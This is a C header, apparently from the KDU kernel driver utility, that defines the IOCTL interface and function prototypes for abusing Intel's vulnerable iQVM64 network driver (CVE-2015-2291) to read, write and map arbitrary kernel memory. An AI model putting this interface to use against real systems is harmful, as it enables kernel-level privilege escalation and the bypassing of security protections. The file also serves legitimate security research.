mirror of https://github.com/hfiref0x/KDU.git
120 lines
3.3 KiB
C
120 lines
3.3 KiB
C
/*******************************************************************************
|
|
*
|
|
* (C) COPYRIGHT AUTHORS, 2020
|
|
*
|
|
* TITLE: NAL.H
|
|
*
|
|
* VERSION: 1.00
|
|
*
|
|
* DATE: 24 Jan 2020
|
|
*
|
|
* Intel Network Adapter iQVM64 driver interface header.
|
|
*
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
* PARTICULAR PURPOSE.
|
|
*
|
|
*******************************************************************************/
|
|
|
|
#pragma once
|
|
|
|
//
|
|
// INTEL NAL driver interface for CVE-2015-2291.
|
|
//
|
|
|
|
#define INTEL_DEVICE_TYPE (DWORD)0x8086
|
|
#define INTEL_DEVICE_FUNCTION (DWORD)2049
|
|
|
|
#define NAL_FUNCID_MAPIOSPACE (DWORD)0x19
|
|
#define NAL_FUNCID_UNMAPIOSPACE (DWORD)0x1A
|
|
#define NAL_FUNCID_VIRTUALTOPHYSCAL (DWORD)0x25
|
|
#define NAL_FUNCID_MEMSET (DWORD)0x30
|
|
#define NAL_FUNCID_MEMMOVE (DWORD)0x33
|
|
|
|
#define IOCTL_NAL_MANAGE CTL_CODE(INTEL_DEVICE_TYPE, INTEL_DEVICE_FUNCTION, METHOD_NEITHER, FILE_ANY_ACCESS) //0x80862007
|
|
|
|
|
|
typedef struct _NAL_REQUEST_HEADER {
|
|
ULONG_PTR FunctionId;
|
|
ULONG_PTR Unused0;
|
|
} NAL_REQUEST_HEADER, * PNAL_REQUEST_HEADER;
|
|
|
|
typedef struct _NAL_GET_PHYSICAL_ADDRESS {
|
|
NAL_REQUEST_HEADER Header;
|
|
ULONG_PTR PhysicalAddress;
|
|
ULONG_PTR VirtualAddress;
|
|
} NAL_GET_PHYSICAL_ADDRESS, * PNAL_GET_PHYSICAL_ADDRESS;
|
|
|
|
typedef struct _NAL_MEMMOVE {
|
|
NAL_REQUEST_HEADER Header;
|
|
ULONG_PTR SourceAddress;
|
|
ULONG_PTR DestinationAddress;
|
|
ULONG_PTR Length;
|
|
} NAL_MEMMOVE, * PNAL_MEMMOVE;
|
|
|
|
typedef struct _NAL_MAP_IO_SPACE {
|
|
NAL_REQUEST_HEADER Header;
|
|
ULONG_PTR OpResult; //0 mean success
|
|
ULONG_PTR VirtualAddress;
|
|
ULONG_PTR PhysicalAddress;
|
|
ULONG NumberOfBytes;
|
|
} NAL_MAP_IO_SPACE, * PNAL_MAP_IO_SPACE;
|
|
|
|
typedef struct _NAL_UNMAP_IO_SPACE {
|
|
NAL_REQUEST_HEADER Header;
|
|
ULONG_PTR OpResult; //0 mean success
|
|
ULONG_PTR VirtualAddress;
|
|
ULONG_PTR Unused0;
|
|
ULONG NumberOfBytes;
|
|
} NAL_UNMAP_IO_SPACE, * PNAL_UNMAP_IO_SPACE;
|
|
|
|
BOOL NalCallDriver(
|
|
_In_ HANDLE DeviceHandle,
|
|
_In_ PVOID Buffer,
|
|
_In_ ULONG Size);
|
|
|
|
BOOL NalMapAddressEx(
|
|
_In_ HANDLE DeviceHandle,
|
|
_In_ ULONG_PTR PhysicalAddress,
|
|
_Out_ ULONG_PTR* VirtualAddress,
|
|
_In_ ULONG NumberOfBytes);
|
|
|
|
BOOL NalUnmapAddress(
|
|
_In_ HANDLE DeviceHandle,
|
|
_In_ ULONG_PTR VirtualAddress,
|
|
_In_ ULONG NumberOfBytes);
|
|
|
|
BOOL NalVirtualToPhysical(
|
|
_In_ HANDLE DeviceHandle,
|
|
_In_ ULONG_PTR VirtualAddress,
|
|
_Out_ ULONG_PTR* PhysicalAddress);
|
|
|
|
_Success_(return != FALSE)
|
|
BOOL NalReadVirtualMemory(
|
|
_In_ HANDLE DeviceHandle,
|
|
_In_ ULONG_PTR VirtualAddress,
|
|
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
|
|
_In_ ULONG NumberOfBytes);
|
|
|
|
_Success_(return != FALSE)
|
|
BOOL NalWriteVirtualMemory(
|
|
_In_ HANDLE DeviceHandle,
|
|
_In_ ULONG_PTR VirtualAddress,
|
|
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
|
|
_In_ ULONG NumberOfBytes);
|
|
|
|
_Success_(return != FALSE)
|
|
BOOL NalReadVirtualMemoryEx(
|
|
_In_ HANDLE DeviceHandle,
|
|
_In_ ULONG_PTR VirtualAddress,
|
|
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
|
|
_In_ ULONG NumberOfBytes);
|
|
|
|
_Success_(return != FALSE)
|
|
BOOL NalWriteVirtualMemoryEx(
|
|
_In_ HANDLE DeviceHandle,
|
|
_In_ ULONG_PTR VirtualAddress,
|
|
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
|
|
_In_ ULONG NumberOfBytes);
|